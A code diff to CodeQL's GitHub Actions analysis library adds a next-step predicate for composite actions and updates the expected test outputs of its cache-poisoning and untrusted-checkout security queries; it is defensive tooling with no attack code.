a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1002,23 +1002,43 @@ class StepImpl extends AstNodeImpl, TStepNode { IfImpl getIf() { result.getNode() = n.lookup("if") } /** Gets the Runs or LocalJob that this step is in. */ - StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + StepsContainerImpl getContainer() { + result = this.getParentNode().(RunsImpl) or + result = this.getParentNode().(LocalJobImpl) + } + + StepImpl getNextStep() { + // if step is a uses step calling a local composite action, we should follow the called step + this instanceof UsesStepImpl and + exists(CompositeActionImpl a | + a.getACallerStep() = this and + result = a.getRuns().getStep(0) + ) + or + // if step is the last step in a composite action, we should follow the next step in the caller + exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i | + this.getContainer() = runs and + runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and + runs.getEnclosingCompositeAction().getACallerStep() = caller and + caller.getContainer() = caller_container and + caller_container.getStep(i) = caller and + caller_container.getStep(i + 1) = result + ) + or + // next step in the same job/runs + exists(int i | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(i + 1) + ) + } /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { ( - // next step in the same job - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j - ) - or - // next steps in a composite action - exists(RunsImpl runs, int i, int j | - exists(this.getEnclosingCompositeAction()) and - runs.getStep(i) = this and - result = runs.getStep(j) and + // next steps in the same job/runs + exists(int i, int j | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(j) and i < j ) or @@ -1026,10 +1046,10 @@ class StepImpl extends AstNodeImpl, TStepNode { result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() or // if any of the next steps is a call to a local composite actions, we should follow it - exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | - job.getStep(i) = this and + exists(int i, int j, CompositeActionImpl a | + this.getContainer().getStep(i) = this and + this.getContainer().getStep(j) = a.getACallerStep() and i < j and - a.getACallerStep() = job.getStep(j) and result = a.getRuns().getAStep() ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 607a13e142c..3b69110ed12 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -17,7 +17,7 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2656b22e1e3..a97309ce187 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -16,7 +16,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 02054ebbf0a..2026a784d05 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from PRHeadCheckoutStep checkout, PoisonableStep s where diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index eb1412bf0e2..994beb3b74f 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,159 +1,67 @@ edges | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e2c4d966063..400adb446d2 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,17 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | | .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | -| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | -| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 60f3370f6d1..092a7187951 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,350 +1,145 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | 